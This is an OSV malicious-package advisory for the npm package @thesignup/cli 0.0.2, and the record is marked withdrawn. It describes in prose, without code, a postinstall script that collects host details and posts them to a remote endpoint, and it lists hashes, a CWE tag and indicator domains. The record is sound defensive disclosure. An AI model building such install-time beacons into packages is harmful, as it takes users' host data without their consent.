MAL-2026-4456

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/withdrawn/npm/@thesignup/cli/MAL-2026-4456.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-4456

Withdrawn

2026-05-26T18:24:46Z

Published

2026-05-20T03:06:44Z

Modified

2026-05-27T00:31:51.659387823Z

Summary

Malicious code in @thesignup/cli (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (ba2a0430ac2be1496dc77d4ad0a94d89bcf563d4aadb4eb457812b7572aa8367)

The package's scripts/postinstall.cjs runs at install time and performs host reconnaissance (hostname collection, ping/network probing) and posts the results to a remote endpoint via HTTP POST. Lifecycle-time outbound network beacons that gather host identifiers and ship them off-host on npm install are an active-attack shape: every installer of this package becomes a data point for the operator, with no consent and no opt-out, and the beacon fires before the user has even had a chance to read the README. The structural fingerprint (postinstall + ping + hostname read + POST to a remote host) is the canonical install-time exfiltration pattern.

Database specific

{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-003443",
            "import_time": "2026-05-26T05:50:39.189589681Z",
            "sha256": "8eb160b9b736e0120209e13d882edaba68979adac4e98025ab55507017a62080",
            "source": "amazon-inspector",
            "modified_time": "2026-05-20T03:06:45Z",
            "versions": [
                "0.0.2"
            ]
        },
        {
            "id": "IN-MAL-2026-003442",
            "import_time": "2026-05-26T05:50:39.082387478Z",
            "sha256": "ba2a0430ac2be1496dc77d4ad0a94d89bcf563d4aadb4eb457812b7572aa8367",
            "source": "amazon-inspector",
            "modified_time": "2026-05-20T03:06:44Z",
            "versions": [
                "0.0.2"
            ]
        }
    ]
}

References

https://www.npmjs.com/package/@thesignup/cli/v/0.0.2

Credits

- Amazon Inspector - FINDER
- - actran@amazon.com

Affected packages

npm / @thesignup/cli

Package

Name: @thesignup/cli; View open source insights on deps.dev
Purl: pkg:npm/%40thesignup%2Fcli

Affected ranges

Affected versions

0.*

0.0.2

Database specific

cwes

[
    {
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature."
    }
]

source

"https://github.com/ossf/malicious-packages/blob/main/osv/withdrawn/npm/@thesignup/cli/MAL-2026-4456.json"

indicators

{
    "evidence_files": [
        {
            "path": "scripts/postinstall.cjs",
            "sha256": "a16a00d8543fd436591dcca443509a160b85ce7c84cea98163971f01593880bd",
            "tlsh": "e9e1c8cc5aeb523017b3715a961fb089e7a754133319c8b4f89d41083f92678cbe79ea"
        }
    ],
    "package_integrity": [
        {
            "filename": "cli-0.0.2.tgz",
            "hashes": {
                "sha512_sri": "sha512-8bg6sN3rHdzrI8qf042NN3yZKG93uh782/2J1tflf/i3cPK1xERaByda2E2FagR44DEagjpzXjJFnO+ftxLvWQ==",
                "sha1": "f011682761d1a49bfa9e3174146f9145609bf811"
            }
        }
    ],
    "domains": [
        "34.0.16.104.in-addr.arpa",
        "34.1.16.104.in-addr.arpa",
        "github.com",
        "release-assets.githubusercontent.com"
    ]
}